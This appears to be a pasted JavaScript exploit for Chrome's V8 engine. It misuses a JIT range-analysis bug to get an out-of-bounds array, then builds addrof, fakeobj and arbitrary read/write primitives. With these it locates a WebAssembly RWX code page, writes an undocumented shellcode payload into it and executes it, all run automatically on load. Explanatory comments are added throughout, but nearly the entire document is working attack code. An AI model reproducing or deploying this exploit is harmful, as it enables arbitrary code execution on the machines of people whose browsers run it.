xosski

Chrome var wasm_code

Oct 3rd, 2024
// Minimal WebAssembly module given as raw bytes. The first eight bytes are the
// standard header (0,97,115,109 = "\0asm", then version 1); the export section
// names "memory" (109,101,109,111,114,121) and "main" (109,97,105,110); the only
// function body ends in 65,42,11, i.e. `i32.const 42` / `end`. By itself the
// module does nothing but return 42 — it is instantiated so that a code page
// for it exists (see get_wasm_rwx / run_shellcode below).
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
// Exported `main`; exp() calls it last, after run_shellcode() has overwritten its page.
var wasm_function = wasm_instance.exports.main;
// Opaque machine-code payload as 32-bit words. run_shellcode() copies it with
// DataView.setUint32(4*i, word, true), i.e. little-endian, into the page found
// by get_wasm_rwx(). What it does when executed is not stated on the page.
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];

// 0x300-byte buffer. run_shellcode() overwrites the field it calls the backing
// store (addrof(arb_write_buffer) + 0x14n) so that a DataView over this buffer
// writes somewhere else.
let arb_write_buffer = new ArrayBuffer(0x300);
  8.  
// Type-punning helpers: one 16-byte buffer viewed as uint32 / float64 / uint64,
// used to reinterpret the bits of a double as an integer and back.
class Helpers {
  constructor() {
    // All three views alias the same 16 bytes, so a write through one view is
    // immediately visible through the others.
    this.buf = new ArrayBuffer(16);
    this.uint32 = new Uint32Array(this.buf);
    this.float64 = new Float64Array(this.buf);
    this.big_uint64 = new BigUint64Array(this.buf);
  }

  // Reinterpret the bits of a double as a 64-bit unsigned BigInt.
  f2i(f) {
    this.float64[0] = f;
    return this.big_uint64[0];
  }

  // Reinterpret a 64-bit unsigned BigInt as a double.
  i2f(i) {
    this.big_uint64[0] = i;
    return this.float64[0];
  }

  // Store a double and return all four uint32 words of the 16-byte buffer as a
  // plain Array (in platform byte order: on little-endian hosts the first two
  // entries are the low and high halves of val).
  f2half(val) {
    this.float64[0] = val;
    return [...this.uint32];
  }

  // Inverse of f2half: write an array-like of uint32 words (starting at word 0)
  // and read the result back as a double.
  half2f(val) {
    this.uint32.set(val);
    return this.float64[0];
  }

  // Format a Number or BigInt as a 0x-prefixed lowercase hex string.
  hex(a) {
    return `0x${a.toString(16)}`;
  }

  // Allocate and immediately drop 100 x 16 MiB buffers to pressure the heap
  // into a garbage-collection cycle.
  gc() {
    let remaining = 100;
    while (remaining-- > 0) {
      new ArrayBuffer(0x1000000);
    }
  }
}
  50.  
// The function the bug chain is built around. confusion_to_oob() calls it
// 0x10000 times with flag === false so it gets JIT-compiled, then once with
// flag === true. Returns [vuln_array, oob_array]. The exact shape and order of
// these statements is what the chain depends on; they are left as written.
// On an engine without the bug, `new Array(len)` below throws a RangeError on
// the flag === true call (len is -4294967295), and the chain stops here.
function foo(flag) {
  // Trigger the bug so that len == 1 while its Range is (-4294967295, 0)
  // (author's note; "Range" is the JIT's range-analysis result for len)
  let x = -1;
  if (flag) x = 0xFFFF_FFFF;
  let len = 0 - Math.max(0, x);
  // Use array.shift() to build an array whose length is -1 (0xFFFFFFFE) (author's note)
  let vuln_array = new Array(len);
  vuln_array.shift();

  // Allocated right after vuln_array; confusion_to_oob() later writes
  // vuln_array[16] intending to reach this array's length (author's note there).
  let oob_array = [1.1, 1.2, 1.3];

  if (flag) {
    // d8 natives-syntax debugging aids (need --allow-natives-syntax), left disabled
    //%DebugPrint(oob_array);
    //%SystemBreak();
  }
  return [vuln_array, oob_array];
}
  68.  
// Step 1 of exp(): turn the foo() miscompile into an out-of-bounds array.
// Reads the global `helper` (assigned in exp) and assigns the globals
// `vuln_array` and `oob_array` without declaring them (implicit globals; this
// would throw under 'use strict').
function confusion_to_oob() {
  console.log("[+] convert confusion to oob......");
  // Trigger the JIT: warm foo() up on the benign (flag === false) path
  for (let i=0; i<0x10000; i++) {foo(false);}
  // gc
  helper.gc();
  // Overwrite oob_array's length (author's note): vuln_array[16] is expected
  // to alias oob_array's length field after the shift() trick in foo().
  [vuln_array, oob_array] = foo(true);
  vuln_array[16] = 0xc00c;

  // If the step worked this prints 0xc00c instead of 0x3.
  console.log(" oob_array.length: " + helper.hex(oob_array.length));
}
  81.  
// Leak the address of obj: store it through vuln_array[7] and read the same
// slot back as a double through oob_array[0]. Returns a BigInt masked to the
// low 32 bits (the page's later comments mention pointer compression).
// Assumes vuln_array[7] and oob_array[0] alias the same memory after
// confusion_to_oob(); both are the globals set up there.
function addrof(obj) {
  vuln_array[7] = obj;

  return helper.f2i(oob_array[0]) & 0xFFFF_FFFFn;
}
  87.  
// Inverse of addrof(): write addr (a BigInt) as a double into oob_array[0]
// and read it back through vuln_array[7] as an object reference.
// Relies on the same aliasing of oob_array[0] and vuln_array[7] as addrof().
function fakeobj(addr) {
  oob_array[0] = helper.i2f(addr);

  return vuln_array[7];
}
  93.  
// Step 2 of exp(): build the two objects arb_read()/arb_write() use. Assigns
// the globals `point_array` and `fake` without declaring them. point_array's
// first element carries the bits read from oob_array[3]; `fake` is whatever
// fakeobj() yields at addrof(point_array) - 0x20n. The slot index 3 and the
// 0x20n offset are specific to the V8 build this was written against and are
// not explained on the page.
function get_arw() {
  console.log("[+] get absolute read/write access......");

  let oob_array_map_and_properties = helper.f2i(oob_array[3]);
  point_array = [helper.i2f(oob_array_map_and_properties), 1.1, 1.2, 1.3];
  fake = fakeobj(addrof(point_array) - 0x20n);
}
  101.  
// Read the 8 bytes at addr (a BigInt) through `fake`, which get_arw() set up
// over point_array. Returns a double; the caller (get_wasm_rwx) reinterprets
// it with helper.f2i(). Note: reassigns its own parameter.
function arb_read(addr) {
  // Force the low bit set (make addr odd) when it is even
  if (addr %2n == 0) {
    addr += 1n;
  }
  // 2n << 32n fills the length field; under pointer compression the length
  // value is changed to 0x1 (author's note);
  // -8n because what the elements field points to is automatically advanced
  // by 8 to skip map and length (author's note)
  point_array[1] = helper.i2f((2n << 32n) + addr -8n);
  return fake[0];
}
  111.  
// Write 8 bytes at addr (a BigInt) through `fake`, mirroring arb_read():
// val is converted with BigInt() and stored as the double with those bits.
// Note: reassigns its own parameter.
function arb_write(addr, val) {
  // Force the low bit set (make addr odd) when it is even
  if (addr %2n == 0) {
    addr += 1n;
  }
  // 2n << 32n fills the length field; under pointer compression the length
  // value is changed to 0x1 (author's note);
  // -8n because what the elements field points to is automatically advanced
  // by 8 to skip map and length (author's note)
  point_array[1] = helper.i2f((2n << 32n) + addr -8n);
  fake[0] = helper.i2f(BigInt(val));
}
  121.  
// Step 3 of exp(): read the 8-byte field at addrof(wasm_instance) + 0x68n and
// keep it in the global `rwx_page_addr` (assigned without declaration). The
// page treats this as the address of the wasm instance's RWX code page; the
// 0x68n offset is build-specific and not explained on the page.
function get_wasm_rwx() {
  console.log("[+] get address of rwx page......");
  rwx_page_addr = helper.f2i(arb_read(addrof(wasm_instance) + 0x68n));
  // d8 natives-syntax debugging aids (need --allow-natives-syntax), left disabled
  //%DebugPrint(wasm_instance);
  //%DebugPrint(wasm_function);
  console.log(" Address of rwx page: " + helper.hex(rwx_page_addr));
  //%SystemBreak();
}
  130.  
// Step 4 of exp(): copy `shellcode` (an array of 32-bit words) to addr.
// arb_write() first overwrites the field at addrof(arb_write_buffer) + 0x14n
// (called backing_store_addr here) with addr, so that the DataView over
// arb_write_buffer writes into that page; each word is then stored
// little-endian at byte offset 4*i. The "success" message only means the copy
// loop finished — nothing runs until exp() calls wasm_function().
// Note: the parameter `shellcode` shadows the global of the same name.
function run_shellcode(addr, shellcode) {
  console.log("[+] run shellcode......");
  let dataview = new DataView(arb_write_buffer);
  let buf_addr = addrof(arb_write_buffer);
  let backing_store_addr = buf_addr + 0x14n;
  arb_write(backing_store_addr, addr);
  for (let i = 0; i < shellcode.length; i++) {
    dataview.setUint32(4*i, shellcode[i], true);
  }
  console.log("[+] success!!!");
}
  142.  
// Driver: runs the four stages in order, then calls the wasm export whose
// code page run_shellcode() just overwrote. Assigns the global `helper`
// without declaring it; every later stage reads it.
function exp() {
  helper = new Helpers();

  confusion_to_oob();
  get_arw();
  get_wasm_rwx();
  run_shellcode(rwx_page_addr, shellcode);
  wasm_function();
}
  152.  
// Runs the whole chain as soon as the script is loaded.
exp();